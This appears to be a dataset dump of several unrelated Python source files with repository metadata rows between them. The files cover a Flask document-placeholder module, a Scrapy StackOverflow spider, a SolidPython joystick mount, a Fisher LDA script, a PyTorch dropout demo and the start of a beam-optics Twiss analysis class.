            DocumentPlaceholder.placeholder_id == tpl_placeholder.id
        ).filter(
            DocumentPlaceholder.document_id == document_base.id
        ).first()
        # skip placeholders the document already has
        if not existing:
            db.session.add(DocumentPlaceholder(
                document_id=document_base.id,
                placeholder_id=tpl_placeholder.id,
            ))
    db.session.commit()
def update_documents(template_id):
    '''
    Re-sync placeholders for every document built from template_id and
    return how many documents were processed.
    '''
    matching = DocumentBase.query.filter(
        DocumentBase.template_id == template_id
    ).all()
    for doc in matching:
        set_document_placeholders(template_id, doc)
    return len(matching)
def create_new_document(template_id, data):
    '''
    Create a DocumentBase from template_id, seed its placeholders, and
    return the new document's id.
    '''
    # NOTE(review): naive UTC timestamp, matching existing rows -- confirm
    # before switching to timezone-aware datetimes.
    timestamp = datetime.datetime.utcnow()
    new_document = DocumentBase(
        created_at=timestamp,
        updated_at=timestamp,
        name=data.get('name'),
        template_id=template_id
    )
    db.session.add(new_document)
    db.session.commit()
    set_document_placeholders(template_id, new_document)
    return new_document.id
def save_document_section(placeholders, data):
    '''
    Copy submitted values from data into each placeholder row, keyed by
    display_name (missing keys default to ''); commits once at the end.
    '''
    for entry in placeholders:
        row = DocumentPlaceholder.query.get(entry.id)
        row.value = data.get(entry.display_name, '')
    db.session.commit()
    return True
def delete_document(document):
    '''Delete the given document row and persist the removal.'''
    session = db.session
    session.delete(document)
    session.commit()
    return True
| 31.333333
| 90
| 0.730091
| 363
| 3,290
| 6.402204
| 0.212121
| 0.055938
| 0.02926
| 0.025818
| 0.283993
| 0.241394
| 0.186747
| 0.093804
| 0.093804
| 0.093804
| 0
| 0
| 0.189362
| 3,290
| 104
| 91
| 31.634615
| 0.871391
| 0.091185
| 0
| 0.239437
| 0
| 0
| 0.00136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140845
| false
| 0
| 0.070423
| 0.028169
| 0.338028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a3b150e872655275d100c3ba1868368c2d52e0
| 716
|
py
|
Python
|
katph/spiders/stackoverflow_spider.py
|
trujunzhang/katph
|
b71b5a7171b133fcf087f77cd612c13a966ecd61
|
[
"MIT"
] | null | null | null |
katph/spiders/stackoverflow_spider.py
|
trujunzhang/katph
|
b71b5a7171b133fcf087f77cd612c13a966ecd61
|
[
"MIT"
] | null | null | null |
katph/spiders/stackoverflow_spider.py
|
trujunzhang/katph
|
b71b5a7171b133fcf087f77cd612c13a966ecd61
|
[
"MIT"
] | null | null | null |
import scrapy
from scrapy.selector import Selector
from katph.items import StackItem
class katphSpider(scrapy.Spider):
    """Scrape the newest StackOverflow questions listing page."""

    name = "stackoverflow"
    allowed_domains = ["stackoverflow.com"]
    start_urls = [
        "%s/questions?pagesize=50&sort=newest" % "http://stackoverflow.com",
    ]

    def parse(self, response):
        """Yield one StackItem (title, url) per question summary heading."""
        for node in Selector(response).xpath('//div[@class="summary"]/h3'):
            entry = StackItem()
            entry['title'] = node.xpath('a[@class="question-hyperlink"]/text()').extract()[0]
            entry['url'] = node.xpath('a[@class="question-hyperlink"]/@href').extract()[0]
            yield entry
| 31.130435
| 76
| 0.603352
| 75
| 716
| 5.733333
| 0.6
| 0.074419
| 0.065116
| 0.088372
| 0.167442
| 0.167442
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.24581
| 716
| 22
| 77
| 32.545455
| 0.787037
| 0
| 0
| 0
| 0
| 0
| 0.27514
| 0.188547
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.166667
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a6214120a911400cce37d1a1a474426ab60fe5
| 1,284
|
py
|
Python
|
hardware/joystick.py
|
davidji/roundbot
|
2ca34a83c9feb3331f1b818106f06b3182c4970e
|
[
"Apache-2.0"
] | null | null | null |
hardware/joystick.py
|
davidji/roundbot
|
2ca34a83c9feb3331f1b818106f06b3182c4970e
|
[
"Apache-2.0"
] | null | null | null |
hardware/joystick.py
|
davidji/roundbot
|
2ca34a83c9feb3331f1b818106f06b3182c4970e
|
[
"Apache-2.0"
] | null | null | null |
from solid import *
from solid.utils import *
import util
from util import inch_to_mm, tube, ABIT, corners, pipe
from fixings import M3
from math import tan, radians
"""
Sub-miniature analog joy-sticks.
There's not much useful in documentation of their measurements.
I'm going to treat it like a sphere with a 14mm radius, with a
12mm diameter cylinder sticking out the top.
40 degrees in any direction. The knob on the top is 20mm wide
so the hole in the panel must be at least that wide.
"""
# Block dimensions (mm) for the sub-miniature joystick mount described above.
fixing = M3  # fixing screw size
width=35.0  # overall block width
depth=35.0  # overall block depth
pivot_height=9.6  # height of the stick pivot above the block base -- TODO confirm
panel_height=11.0  # panel section thickness above the pivot
height=pivot_height+panel_height  # total extruded height
def block():
    """
    Build the joystick mounting block as a single CSG solid.

    Starts from a 35x35 extruded square (shifted forward 1.8), subtracts a
    14-radius sphere and cylinder as clearance for the stick's ball and
    base, adds a hole() cone (tan(30 deg) taper through the panel) for the
    stick's swing, and subtracts two further recesses at the base.
    NOTE(review): term order in this +/- chain is significant to the CSG
    result -- do not reorder.
    """
    return down(pivot_height+panel_height)(forward(1.8)(linear_extrude(height)(square([35,35], center=True))) -
    up(pivot_height)(sphere(r=14.0)) -
    down(ABIT)(cylinder(h=pivot_height+ABIT, r=14.0)) +
    up(pivot_height)(hole()(cylinder(r1=6.0, r2=6.0 + tan(radians(30.0))*panel_height, h=panel_height))) -
    forward(1.8)(linear_extrude(pivot_height)(square([14.0, depth], center=True))) -
    forward(1.8)(linear_extrude(1.6)(square([25.5, 32.0], center=True))))
def fixings():
    """Fixing-hole positions: the four corners of a 20.4 x 26.6 rectangle."""
    return corners(20.4, 26.6)

def export_scad():
    """Render the block model and save it as 'joystick-block'."""
    util.save('joystick-block', block())

if __name__ == '__main__':
    export_scad()
| 28.533333
| 114
| 0.696262
| 215
| 1,284
| 4.032558
| 0.506977
| 0.088812
| 0.031142
| 0.051903
| 0.101499
| 0.076125
| 0.076125
| 0
| 0
| 0
| 0
| 0.059211
| 0.17134
| 1,284
| 44
| 115
| 29.181818
| 0.755639
| 0
| 0
| 0
| 0
| 0
| 0.023037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.24
| 0.08
| 0.44
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9ab3dbd3f61574c06a9441f006ee914a6d3064c
| 4,458
|
py
|
Python
|
Fishers LDA/fishersLDA.py
|
Exorust/Machine-Learning-Algorithms
|
c634fd0a1a49ea2574f0867b591ee8a2cd401fd2
|
[
"MIT"
] | null | null | null |
Fishers LDA/fishersLDA.py
|
Exorust/Machine-Learning-Algorithms
|
c634fd0a1a49ea2574f0867b591ee8a2cd401fd2
|
[
"MIT"
] | null | null | null |
Fishers LDA/fishersLDA.py
|
Exorust/Machine-Learning-Algorithms
|
c634fd0a1a49ea2574f0867b591ee8a2cd401fd2
|
[
"MIT"
] | null | null | null |
'''**********************************************
CODE TO IMPLEMENT FISHER'S LDA -
Given two dimensional dataset with two classes 0 and 1,
Perform Fisher's LDA on the dataset,
Perform dimensionality reduction and find the suitable vector to project it onto,
Find the threshold value for separation of the two classes
***********************************************'''
import numpy as np
import matplotlib.pyplot as plt
import time
# record the start time to report the script's execution time at the end
start_time = time.time()
# read the data csv file
my_data = np.genfromtxt('datasets/dataset_3.csv', delimiter=',')
# delete the serial-number column
data=np.delete(my_data,0,1)
# separate the two classes (column 2 is the 0/1 label), then drop the label column
class0 = data[np.nonzero(data[:,2] == 0)]
class1=data[np.nonzero(data[:,2]==1)]
class0=np.delete(class0,2,1)
class1=np.delete(class1,2,1)
# per-class means (column-wise)
mean0=np.mean(class0,0)
mean1=np.mean(class1,0)
''' calculate the within-class variability of the two classes using:
variability = sum over points of class ((xi-mean)(xi-mean)^T)
'''
var0=np.zeros(1)
temp=np.array(mean0)
for i in range (class0.shape[0]) :
    temp=(class0[i,:]-mean0)
    var0+=np.dot(temp, temp.T)
var1=np.zeros(1)
temp=np.array(mean1)
for i in range (class1.shape[0]) :
    temp=(class1[i,:]-mean1)
    var1+=np.dot(temp, temp.T)
# within-class scatter (scalar here, since the dot products collapse to scalars)
sw=var1+var0
# inverse of the Sw matrix
invsw=np.array([(1/sw[0])])
# Fisher discriminant direction w = Sw^-1 (m1 - m0)
w=invsw*(mean1-mean0)
# arrays for each point's distance from the projection line
dist0=np.zeros((class0.shape[0],1))
dist1=np.zeros((class1.shape[0],1))
# the line to draw/project onto: perpendicular of w
# NOTE(review): projection below uses wperp (rotated w), not w itself --
# confirm this matches the intended visualization.
wperp=np.array([-w[1],w[0]])
# norm of the projection vector
norm_w=np.linalg.norm(wperp)
''' distance of each original data point from the vector:
r = w.T x / norm(w)
'''
for i in range(dist0.shape[0]):
    dist0[i]=np.dot(wperp.T,class0[i,:])/norm_w
for i in range(dist1.shape[0]):
    dist1[i]=np.dot(wperp.T,class1[i,:])/norm_w
''' projected points (still in 2-D) using:
x_projected = x_actual - r*w/norm(w)
'''
class0proj=np.zeros((class0.shape[0],2))
class1proj=np.zeros((class1.shape[0],2))
for i in range(class0.shape[0]):
    class0proj[i,:]=np.subtract((class0[i,:]),(dist0[i]*wperp.T/norm_w))
for i in range(class1.shape[0]):
    class1proj[i,:]=np.subtract((class1[i,:]),(dist1[i]*wperp.T/norm_w))
# plot the original data, the projected points, and the projection line
plt.scatter(class0[:,0],class0[:,1])
plt.scatter(class1[:,0],class1[:,1])
plt.scatter(class0proj[:,0],class0proj[:,1],color='blue')
plt.scatter(class1proj[:,0],class1proj[:,1],color='red')
# concatenate the two classes into a single array to draw the line through them
pointsproj=np.concatenate((class0proj,class1proj),axis=0)
plt.plot(pointsproj[:,0],pointsproj[:,1],'m')
# dimensionally-reduced (1-D) projections: y(x) = w.T x
newproj0=np.zeros((class0.shape[0],1))
newproj1=np.zeros((class1.shape[0],1))
for i in range(class0.shape[0]):
    newproj0[i,:]=np.dot(wperp.T,class0[i,:])
for i in range(class1.shape[0]):
    newproj1[i,:]=np.dot(wperp.T,class1[i,:])
# means and standard deviations of the 1-D projected classes
proj0mean=np.mean(newproj0)
proj1mean=np.mean(newproj1)
proj0std=np.std(newproj0)
proj1std=np.std(newproj1)
'''
The "solve" function below finds the threshold value separating the two
dimensionally-reduced classes -
input : m1, m2 - means of the two classes whose point of intersection is wanted
std1, std2 - standard deviations of the two classes
'''
def solve(m1,m2,std1,std2):
    """
    Return the decision threshold between two 1-D Gaussians.

    Equating the two Gaussian log-densities N(m1, std1) and N(m2, std2)
    gives the quadratic a*x^2 + b*x + c = 0 solved below.

    Parameters: m1, m2 -- class means; std1, std2 -- class standard deviations.
    Returns: the intersection point lying between the two means when the
    quadratic has two roots (falling back to the first root if neither lies
    between them); otherwise the single-root array from np.roots (the
    equal-variance case, where a == 0 and the midpoint-like root is unique).
    """
    a = 1/(2*std1**2) - 1/(2*std2**2)
    b = m2/(std2**2) - m1/(std1**2)
    c = m1**2 /(2*std1**2) - m2**2 / (2*std2**2) - np.log(std2/std1)
    roots= np.roots([a,b,c])
    # Two intersection points exist when std1 != std2; select the one that
    # lies between the two class means.  (Bug fix: the original condition
    # used `or`, which is true for every root, so roots[0] was always
    # returned regardless of its position.)
    if roots.shape[0]>1:
        lo, hi = min(m1, m2), max(m1, m2)
        for root in roots:
            if lo <= root <= hi:
                return root
        return roots[0]  # degenerate case: no root between the means
    else:
        return roots
# locate the decision threshold between the two projected clusters,
# report it along with the elapsed time, and save the plot
threshold=solve(proj0mean,proj1mean,proj0std,proj1std)
print("Threshold value =", threshold)
print("Time taken = ",(time.time()-start_time))
plt.savefig('Results/Result3.png')
| 32.540146
| 104
| 0.685509
| 729
| 4,458
| 4.175583
| 0.260631
| 0.029566
| 0.01774
| 0.032523
| 0.167214
| 0.127792
| 0.086071
| 0
| 0
| 0
| 0
| 0.045764
| 0.142216
| 4,458
| 136
| 105
| 32.779412
| 0.750262
| 0.274563
| 0
| 0.085714
| 0
| 0
| 0.031373
| 0.008627
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014286
| false
| 0
| 0.042857
| 0
| 0.085714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9ad668ebc54401a790054fd2f8bfe6c1d6a7c9b
| 3,071
|
py
|
Python
|
study/pytorch_study/14_dropout.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | 2
|
2020-04-06T09:09:19.000Z
|
2020-07-24T03:59:55.000Z
|
study/pytorch_study/14_dropout.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
study/pytorch_study/14_dropout.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import torch
# Network sizes: 1-D regression with a deliberately oversized hidden layer.
n_input = 1
# n_hidden should be very big to make dropout's effect more clear
n_hidden = 100
n_output = 1
EPOCH = 1000
LR = 0.01
torch.manual_seed(1)    # reproducible
N_SAMPLES = 20
# training data: y = x + Gaussian noise
x = torch.unsqueeze(torch.linspace(-1, 1, N_SAMPLES), 1)
y = x + 0.3 * torch.normal(torch.zeros(N_SAMPLES, 1), torch.ones(N_SAMPLES, 1))
# test data drawn from the same distribution
test_x = torch.unsqueeze(torch.linspace(-1, 1, N_SAMPLES), 1)
test_y = test_x + 0.3 * torch.normal(torch.zeros(N_SAMPLES, 1), torch.ones(N_SAMPLES, 1))
# show the raw data
plt.scatter(x.data.numpy(), y.data.numpy(), c='magenta', s=50, alpha=0.5, label='train')
plt.scatter(test_x.data.numpy(), test_y.data.numpy(), c='cyan', s=50, alpha=0.5, label='test')
plt.legend(loc='upper left')
plt.ylim((-2.5, 2.5))
plt.show()
# plain MLP with no regularization -- expected to overfit
net_overfitting = torch.nn.Sequential(
    torch.nn.Linear(n_input, n_hidden),
    torch.nn.ReLU(),
    torch.nn.Linear(n_hidden, n_hidden),
    torch.nn.ReLU(),
    torch.nn.Linear(n_hidden, n_output)
)
# same architecture with 50% dropout after each linear layer
net_dropout = torch.nn.Sequential(
    torch.nn.Linear(n_input, n_hidden),
    torch.nn.Dropout(0.5),
    torch.nn.ReLU(),
    torch.nn.Linear(n_hidden, n_hidden),
    torch.nn.Dropout(0.5),
    torch.nn.ReLU(),
    torch.nn.Linear(n_hidden, n_output)
)
optimizer_overfit = torch.optim.Adam(net_overfitting.parameters(), lr=LR)
optimizer_drop = torch.optim.Adam(net_dropout.parameters(), lr=LR)
loss_func = torch.nn.MSELoss()
plt.ion()  # interactive mode so the plot refreshes inside the loop
for i in range(EPOCH):
    pred_overfit = net_overfitting(x)
    pred_drop = net_dropout(x)
    loss_overfit = loss_func(pred_overfit, y)
    loss_drop = loss_func(pred_drop, y)
    optimizer_overfit.zero_grad()
    optimizer_drop.zero_grad()
    loss_overfit.backward()
    loss_drop.backward()
    optimizer_overfit.step()
    optimizer_drop.step()
    # continuing from above
    if i % 10 == 0:  # redraw the plot every 10 steps
        # change to eval mode in order to fix dropout's effect
        net_overfitting.eval()
        # parameters for dropout differ from train mode
        net_dropout.eval()
        # plotting
        plt.cla()
        test_pred_ofit = net_overfitting(test_x)
        test_pred_drop = net_dropout(test_x)
        plt.scatter(x.data.numpy(), y.data.numpy(), c='magenta', s=5, alpha=0.3, label='train')
        plt.scatter(test_x.data.numpy(), test_y.data.numpy(), c='cyan', s=5, alpha=0.3, label='test')
        plt.plot(test_x.data.numpy(), test_pred_ofit.data.numpy(), 'r-', lw=3, label='overfitting')
        plt.plot(test_x.data.numpy(), test_pred_drop.data.numpy(), 'b--', lw=3, label='dropout(50%)')
        plt.text(0, -1.2, 'overfitting loss=%.4f' % loss_func(test_pred_ofit, test_y).data.numpy(),
                 fontdict={'size': 12, 'color': 'red'})
        plt.text(0, -1.5, 'dropout loss=%.4f' % loss_func(test_pred_drop, test_y).data.numpy(),
                 fontdict={'size': 12, 'color': 'orange'})
        plt.legend(loc='upper left');
        plt.ylim((-2.5, 2.5));
        plt.pause(0.1)
        # switch both networks back to training mode
        net_overfitting.train()
        net_dropout.train()
plt.ioff()
plt.show()
| 32.326316
| 101
| 0.652231
| 491
| 3,071
| 3.912424
| 0.240326
| 0.054659
| 0.02811
| 0.043727
| 0.477876
| 0.477876
| 0.432067
| 0.432067
| 0.367517
| 0.367517
| 0
| 0.031163
| 0.184956
| 3,071
| 95
| 102
| 32.326316
| 0.736316
| 0.08043
| 0
| 0.2
| 0
| 0
| 0.05439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9b1301b28dc40f613c5048548a9e3fd67d1e1a8
| 72,649
|
py
|
Python
|
harmonica/twiss.py
|
i-a-morozov/harmonica
|
546e664e59457ad9cc354d108402137e90e0d8c2
|
[
"MIT"
] | null | null | null |
harmonica/twiss.py
|
i-a-morozov/harmonica
|
546e664e59457ad9cc354d108402137e90e0d8c2
|
[
"MIT"
] | null | null | null |
harmonica/twiss.py
|
i-a-morozov/harmonica
|
546e664e59457ad9cc354d108402137e90e0d8c2
|
[
"MIT"
] | null | null | null |
"""
Twiss module.
Compute twiss parameters from amplitude & phase data.
Twiss filtering & processing.
"""
import numpy
import torch
import pandas
from scipy import odr
from .util import mod, generate_pairs, generate_other
from .statistics import weighted_mean, weighted_variance
from .statistics import median, biweight_midvariance, standardize
from .anomaly import threshold, dbscan, local_outlier_factor, isolation_forest
from .decomposition import Decomposition
from .model import Model
from .table import Table
class Twiss():
"""
Returns
----------
Twiss class instance.
Parameters
----------
model: 'Model'
Model instance
table: 'Table'
Table instance
flag: torch.Tensor
external flags for each model location
limit: int | tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
use_model: bool
flag to use precomputed model data
Attributes
----------
model: 'Model'
Model instance
table: 'Table'
Table instance
limit: int | tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
use_model: bool
flag to use precomputed model data
dtype: torch.dtype
data type (from model)
device: torch.device
data device (from model)
flag: torch.Tensor
location flags
count: torch.Tensor
(uncoupled) range limit endpoints [1, 6, 15, 28, 45, 66, 91, 120, ...]
combo: torch.Tensor
(uncoupled) index combinations [..., [..., [[i, j], [i, k]], ...], ...]
shape: torch.Size
initial shape of combo
distance: torch.Tensor
(uncoupled) distance
fx: torch.Tensor
x phase for each location
fy: torch.Tensor
y phase for each location
sigma_fx: torch.Tensor
x phase error for each location
sigma_fy: torch.Tensor
y phase error for each location
fx_correct: torch.Tensor
corrected x phase for each location
fy_correct: torch.Tensor
corrected y phase for each location
sigma_fx_correct: torch.Tensor
corrected x phase error for each location
sigma_fy_correct: torch.Tensor
corrected y phase error for each location
virtual_x: dict
x plane virtual phase data
virtual_y: dict
y plane virtual phase data
correct_x: dict
x plane corrected phase data
correct_y: dict
y plane corrected phase data
action: dict
action data
dict_keys(['jx', 'sigma_jx', 'center_jx', 'spread_jx', 'jy', 'sigma_jy', 'center_jy', 'spread_jy', 'mask'])
data_amplitude: dict
twiss from amplitude data
dict_keys(['bx', 'sigma_bx', 'by', 'sigma_by'])
data_phase: dict
twiss from phase data
dict_keys(['fx_ij', 'sigma_fx_ij', 'fx_m_ij', 'sigma_fx_m_ij', 'fx_ik', 'sigma_fx_ik', 'fx_m_ik', 'sigma_fx_m_ik', 'fy_ij', 'sigma_fy_ij', 'fy_m_ij', 'sigma_fy_m_ij', 'fy_ik', 'sigma_fy_ik', 'fy_m_ik', 'sigma_fy_m_ik', 'ax', 'sigma_ax', 'bx', 'sigma_bx', 'ay', 'sigma_ay', 'by', 'sigma_by'])
ax: torch.Tensor
alfa x
sigma_ax: torch.Tensor
sigma alfa x
bx: torch.Tensor
beta x
sigma_bx: torch.Tensor
sigma beta x
ay: torch.Tensor
alfa y
sigma_ay: torch.Tensor
sigma alfa y
by: torch.Tensor
beta y
sigma_by: torch.Tensor
sigma beta y
Methods
----------
__init__(self, model:'Model', table:'Table', limit:int=8, use_model:bool=False) -> None
Twiss instance initialization.
get_action(self, *, data_threshold:dict={'use': True, 'factor': 5.0}, data_dbscan:dict={'use': False, 'factor': 2.5}, data_local_outlier_factor:dict={'use': False, 'contamination': 0.01}, data_isolation_forest:dict={'use': False, 'contamination': 0.01}, bx:torch.Tensor=None, by:torch.Tensor=None, sigma_bx:torch.Tensor=None, sigma_by:torch.Tensor=None)
Estimate actions at each monitor location with optional data cleaning and estimate action center and spread.
get_twiss_from_amplitude(self) -> None
Estimate twiss from amplitude.
phase_virtual(self, limit:int=None, exclude:list=None, **kwargs) -> None
Estimate x & y phase for virtual locations.
phase_correct(self, *, limit:int=None, **kwargs) -> None
Correct x & y phase for monitor locations.
phase_alfa(a_m:torch.Tensor, f_ij:torch.Tensor, f_m_ij:torch.Tensor, f_ik:torch.Tensor, f_m_ik:torch.Tensor, *, error:bool=True, model:bool=True, sigma_a_m:torch.Tensor=0.0, sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0, sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple
Estimate twiss alfa at index (i) from given triplet (i, j, k) phase data.
phase_beta(b_m:torch.Tensor, f_ij:torch.Tensor, f_m_ij:torch.Tensor, f_ik:torch.Tensor, f_m_ik:torch.Tensor, *, error:bool=True, model:bool=True, sigma_b_m:torch.Tensor=0.0, sigma_f_ij:torch.Tensor=0.0, sigma_f_m_ij:torch.Tensor=0.0, sigma_f_ik:torch.Tensor=0.0, sigma_f_m_ik:torch.Tensor=0.0) -> tuple
Estimate twiss beta at index (i) from given triplet (i, j, k) phase data.
get_twiss_from_phase(self, *, virtual:bool=True, error:bool=True, model:bool=False, use_correct:bool=False, use_correct_sigma:bool=False) -> None
Estimate twiss from phase data.
filter_twiss(self, plane:str = 'x', *, phase:dict={'use': True, 'threshold': 10.00}, model:dict={'use': True, 'threshold': 00.50}, value:dict={'use': True, 'threshold': 00.50}, sigma:dict={'use': True, 'threshold': 00.25}, limit:dict={'use': True, 'threshold': 05.00}) -> dict
Filter twiss for given data plane and cleaning options.
mask_range(self, limit:tuple) -> torch.Tensor
Generate weight mask based on given range limit.
mask_location(self, table:list) -> torch.Tensor
Generate weight mask based on given range limit.
mask_distance(self, function) -> torch.Tensor
Generate weight mask based on given range limit.
process_twiss(self, plane:str='x', *, weight:bool=True, mask:torch.Tensor=None) -> dict
Process twiss data.
get_twiss_from_data(self, n:int, x:torch.Tensor, y:torch.Tensor, *, refit:bool=False, factor:float=5.0, level:float=1.0E-6, sigma_x:torch.Tensor=None, sigma_y:torch.Tensor=None, ax:torch.Tensor=None, bx:torch.Tensor=None, ay:torch.Tensor=None, by:torch.Tensor=None, transport:torch.Tensor=None, **kwargs) -> dict
Estimate twiss from tbt data using ODR fit.
get_ax(self, index:int) -> torch.Tensor
Get ax value and error at given index.
get_bx(self, index:int) -> torch.Tensor
Get bx value and error at given index.
get_fx(self, index:int) -> torch.Tensor
Get fx value and error at given index.
get_ay(self, index:int) -> torch.Tensor
Get ay value and error at given index.
get_by(self, index:int) -> torch.Tensor
Get by value and error at given index.
get_fy(self, index:int) -> torch.Tensor
Get fy value and error at given index.
get_twiss(self, index:int) -> dict
Return twiss data at given index.
get_table(self) -> pandas.DataFrame
Return twiss data at all locations as dataframe.
__repr__(self) -> str
String representation.
__len__(self) -> int:
Number of locations.
__call__(self, limit:int=None) -> pandas.DataFrame
Perform twiss loop with default parameters.
matrix(self, probe:torch.Tensor, other:torch.Tensor) -> tuple
Generate uncoupled transport matrix (or matrices) for given locations.
make_transport(self) -> None
Set transport matrices between adjacent locations.
matrix_transport(self, probe:int, other:int) -> torch.Tensor
Generate transport matrix from probe to other using self.transport.
normal(self, probe:torch.Tensor) -> tuple
Generate uncoupled normal matrix (or matrices) for given locations.
"""
    def __init__(self, model:'Model', table:'Table', flag:torch.Tensor=None, limit:int=8, use_model:bool=False) -> None:
        """
        Twiss instance initialization.
        Parameters
        ----------
        model: 'Model'
            Model instance
        table: 'Table'
            Table instance
        flag: torch.Tensor
            external flags for each model location
        limit: int | tuple
            range limit to use, (min, max), 1 <= min <= max, min is excluded, for full range min==max
        use_model: bool
            flag to use precomputed model data
        Returns
        -------
        None
        """
        self.model, self.table, self.limit, self.use_model = model, table, limit, use_model
        # normalize a scalar limit into a (min, max) range tuple
        self.limit = self.limit if isinstance(self.limit, tuple) else (self.limit, self.limit)
        if self.use_model:
            # precomputed model data must exist and cover the requested range
            if self.model.limit is None:
                raise Exception(f'TWISS: model limit is None')
            if self.model.limit < max(self.limit):
                raise Exception(f'TWISS: requested limit={self.limit} should be less than model limit={self.model.limit}')
        self.size, self.dtype, self.device = self.model.size, self.model.dtype, self.model.device
        if self.model.monitor_count != self.table.size:
            raise Exception(f'TWISS: expected {self.model.monitor_count} monitors in Model, got {self.table.size} in Table')
        if flag is None:
            # default flags: keep the model flag at monitor locations, zero elsewhere
            # note, the comprehension variable 'flag' shadows the parameter inside the list scope only
            self.flag = [flag if kind == self.model._monitor else 0 for flag, kind in zip(self.model.flag, self.model.kind)]
            self.flag = torch.tensor(self.flag, dtype=torch.int64, device=self.device)
        else:
            if len(flag) != self.size:
                raise Exception(f'TWISS: external flag length {len(flag)}, expected length {self.size}')
            self.flag = flag.to(torch.int64).to(self.device)
        if self.use_model:
            # reuse precomputed combination data from the model
            self.count = self.model.count
            self.combo = self.model.combo
            self.index = self.model.index
        else:
            # number of (j, k) pairs available at each range limit value
            self.count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
            # candidate other-location tables, then (i, j)/(i, k) pair combinations per probe
            self.combo = [generate_other(probe, max(self.limit), self.flag) for probe in range(self.size)]
            self.combo = torch.stack([generate_pairs(max(self.limit), 1 + 1, probe=probe, table=table, dtype=torch.int64, device=self.device) for probe, table in enumerate(self.combo)])
            # wrap signed combination indices into valid location indices
            self.index = mod(self.combo, self.size).to(torch.int64)
        self.shape = self.combo.shape
        # distance weight grows by one at each range-limit boundary
        self.distance = torch.ones(max(self.limit)*(2*max(self.limit) - 1), dtype=self.dtype, device=self.device)
        for index in self.count:
            self.distance[index:] += 1.0
        limit_min, limit_max = self.limit
        if limit_min == limit_max:
            # full range: keep all combinations up to limit_max
            self.count = self.count[:limit_max]
            *_, count_max = self.count
            self.combo = self.combo[:, :count_max]
            self.index = self.index[:, :count_max]
            self.distance = self.distance[:count_max]
        if limit_min < limit_max:
            # partial range: keep combinations between limit_min (excluded) and limit_max
            self.count = self.count[limit_min - 1:limit_max]
            count_min, *_, count_max = self.count
            self.combo = self.combo[:, count_min:count_max]
            self.index = self.index[:, count_min:count_max]
            self.distance = self.distance[count_min:count_max]
        if limit_min > limit_max:
            raise Exception(f'TWISS: invalid limit={self.limit}')
        # phase data at all locations, table values inserted at monitor locations
        self.fx = torch.zeros_like(self.model.fx)
        self.fy = torch.zeros_like(self.model.fy)
        self.fx[self.model.monitor_index] = self.table.fx
        self.fy[self.model.monitor_index] = self.table.fy
        self.sigma_fx = torch.zeros_like(self.model.sigma_fx)
        self.sigma_fy = torch.zeros_like(self.model.sigma_fy)
        self.sigma_fx[self.model.monitor_index] = self.table.sigma_fx
        self.sigma_fy[self.model.monitor_index] = self.table.sigma_fy
        # corrected phase containers start as copies of the measured data
        self.fx_correct, self.sigma_fx_correct = torch.clone(self.fx), torch.clone(self.sigma_fx)
        self.fy_correct, self.sigma_fy_correct = torch.clone(self.fy), torch.clone(self.sigma_fy)
        # result containers filled by phase_virtual / phase_correct / get_action / get_twiss_*
        self.virtual_x, self.correct_x = {}, {}
        self.virtual_y, self.correct_y = {}, {}
        self.action, self.data_amplitude, self.data_phase = {}, {}, {}
        # estimated twiss containers, filled by process_twiss
        self.ax, self.sigma_ax = torch.zeros_like(self.model.ax), torch.zeros_like(self.model.sigma_ax)
        self.bx, self.sigma_bx = torch.zeros_like(self.model.bx), torch.zeros_like(self.model.sigma_bx)
        self.ay, self.sigma_ay = torch.zeros_like(self.model.ay), torch.zeros_like(self.model.sigma_ay)
        self.by, self.sigma_by = torch.zeros_like(self.model.by), torch.zeros_like(self.model.sigma_by)
